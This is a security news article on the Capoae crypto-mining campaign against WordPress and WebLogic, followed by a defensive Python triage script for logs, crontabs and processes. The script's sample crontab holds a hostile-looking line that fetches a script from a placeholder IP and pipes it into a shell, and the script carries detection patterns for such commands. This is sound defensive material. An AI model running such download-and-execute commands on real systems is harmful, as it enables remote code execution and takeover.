New Malware Campaign Targets Linux and Web Apps to Install Crypto-Mining Software

Silviu STAHIE

September 23, 2021

Security researchers have identified a new campaign pushing malware that targets Linux devices and specific web applications with the purpose of deploying crypto-mining apps.

Taking over hardware to deploy crypto-mining apps is not uncommon. Criminals try to compromise systems so they can work from them to cut operational costs. Crypto mining is an expensive endeavor, and using other people's systems reduces almost all costs.

Criminals tend to follow a similar path, and it starts by identifying poorly protected devices and services, usually with default or weak credentials. Bitdefender identified a similar campaign a few months ago, with attackers deploying Monero mining malware via weak SSH credentials.

The campaign Akamai security researchers discovered is more complex, as criminals tried a lot harder to obfuscate their activity on compromised systems. Like Bitdefender, Akamai used specially designed honeypots to track the malware's behavior once it entered the system.

The attackers deployed PHP malware, which the researchers named Capoae. The systems are likely compromised via an infected WordPress plugin named 'download-monitor'.

"Download-monitor had been installed after the honeypot's weak WordPress admin credentials had been guessed," said the Akamai researchers. "A 3MB UPX packed Golang binary was also downloaded to /tmp. Upon examination, it was clear the malware had some decryption functionality and an encrypted file stored in another directory."

The goal is to deploy a Golang binary that eventually uses a number of known Oracle WebLogic vulnerabilities to infect systems with weak credentials and deploy XMRig, a crypto-mining software. Of course, it also employs numerous obfuscation tactics in an attempt to stay under the radar.

"Keeping an eye out for higher than normal system resource consumption, odd/unexpected running processes, suspicious artifacts (files, crontab entries, SSH keys, etc.), and suspicious access log entries, etc., will help you potentially identify compromised machines," the researchers also said. A full list of indicators of compromise is also available.
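The signals the researchers list above (repeated login guessing in the web server access log, a plugin upload shortly afterwards, crontab entries pointing at /tmp, and a high-CPU process running from a scratch directory or carrying a miner's name) are easy to turn into a first-pass triage script. The Python below is an added example written for this page; it is not code from the article or from Akamai's report. Every log line, crontab entry and process listing in it is constructed sample data, the IP addresses come from the RFC 5737 documentation ranges, and the thresholds and the short list of miner binary names are assumptions a defender would tune for their own environment.

```python
"""Triage checks for the host-level signals quoted above: login guessing and
plugin uploads in the access log, crontab entries that run from /tmp or pipe a
download into a shell, and processes that run from a scratch directory, carry a
known miner name, or burn an unusual amount of CPU. All sample data is constructed."""
import re
from collections import Counter

# Constructed sample data (not from the article). Addresses are RFC 5737 ranges.
ACCESS_LOG = """\
203.0.113.5 - - [20/Sep/2021:10:01:02 +0000] "POST /wp-login.php HTTP/1.1" 200 2312
203.0.113.5 - - [20/Sep/2021:10:01:03 +0000] "POST /wp-login.php HTTP/1.1" 200 2312
203.0.113.5 - - [20/Sep/2021:10:01:04 +0000] "POST /wp-login.php HTTP/1.1" 200 2312
203.0.113.5 - - [20/Sep/2021:10:01:05 +0000] "POST /wp-login.php HTTP/1.1" 200 2312
203.0.113.5 - - [20/Sep/2021:10:01:06 +0000] "POST /wp-login.php HTTP/1.1" 302 0
203.0.113.5 - - [20/Sep/2021:10:01:40 +0000] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 1880
198.51.100.7 - - [20/Sep/2021:10:02:11 +0000] "GET /index.php HTTP/1.1" 200 5120
198.51.100.7 - - [20/Sep/2021:10:02:15 +0000] "POST /wp-login.php HTTP/1.1" 302 0
"""
CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
* * * * * /tmp/.x/run >/dev/null 2>&1
*/5 * * * * curl -s http://192.0.2.9/a.sh | sh
"""
PS_LISTING = """\
  PID %CPU COMMAND
    1  0.0 /sbin/init
  412  0.3 /usr/sbin/sshd -D
  980  2.1 php-fpm: pool www
 2199 97.5 /tmp/.x/kworkerds --threads=4
 2301 95.0 /usr/bin/xmrig
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
SCRATCH_DIR = re.compile(r'(^|\s|=)/(tmp|var/tmp|dev/shm)/')
PIPE_TO_SHELL = re.compile(r'\b(curl|wget)\b.*\|\s*(ba)?sh\b')
MINER_NAME = re.compile(r'(^|/)(xmrig|minerd)\b', re.I)  # illustrative list, assumed, not exhaustive


def parse_access_log(text):
    """Parse combined-log-format lines into dicts; lines that do not parse are skipped."""
    return [m.groupdict() for m in map(LOG_RE.match, text.splitlines()) if m]


def login_guessing_sources(rows, threshold=4):
    """Source IPs with at least `threshold` failed logins. WordPress answers a failed
    POST to wp-login.php with 200 (the form again) and a successful one with 302."""
    failures = Counter(r['ip'] for r in rows
                       if r['method'] == 'POST' and r['path'].startswith('/wp-login.php')
                       and r['status'] == '200')
    return {ip: n for ip, n in failures.items() if n >= threshold}


def plugin_uploads(rows):
    """(ip, path) for plugin uploads through wp-admin; correlate with the IPs above."""
    return [(r['ip'], r['path']) for r in rows
            if r['method'] == 'POST' and 'upload-plugin' in r['path']]


def suspicious_cron_entries(text):
    """(entry, reason) for crontab lines that run from a scratch directory
    or pipe a download straight into a shell."""
    hits = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith('#'):
            continue
        if SCRATCH_DIR.search(line):
            hits.append((line, 'runs from a world-writable scratch directory'))
        elif PIPE_TO_SHELL.search(line):
            hits.append((line, 'pipes a download straight into a shell'))
    return hits


def suspicious_processes(text, cpu_threshold=80.0):
    """(pid, reasons) for processes running from a scratch directory, carrying a
    known miner name, or above the CPU threshold. High CPU alone is only a hint,
    so every reason is kept for the analyst."""
    hits = []
    for line in text.splitlines()[1:]:  # first line is the ps header
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        pid, cpu, cmd = parts
        exe = cmd.split()[0]
        reasons = []
        if SCRATCH_DIR.match(exe):
            reasons.append('executes from scratch directory')
        if MINER_NAME.search(exe):
            reasons.append('known miner binary name')
        if float(cpu) >= cpu_threshold:
            reasons.append(f'cpu {cpu}%')
        if reasons:
            hits.append((pid, reasons))
    return hits


def triage():
    """Run all four checks over the constructed sample data."""
    rows = parse_access_log(ACCESS_LOG)
    return {
        'login_guessing': login_guessing_sources(rows),
        'plugin_uploads': plugin_uploads(rows),
        'cron': suspicious_cron_entries(CRONTAB),
        'processes': suspicious_processes(PS_LISTING),
    }


if __name__ == '__main__':
    for section, findings in triage().items():
        print(section, findings)
```

On a real host the three constants would be replaced by the web server's access log, the output of `crontab -l` for each user, and `ps -eo pid,pcpu,args`; the value of the script is in the correlation, since the same source address guessing the admin password and then uploading a plugin, followed by a new high-CPU process under /tmp, is the sequence the honeypot observed.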
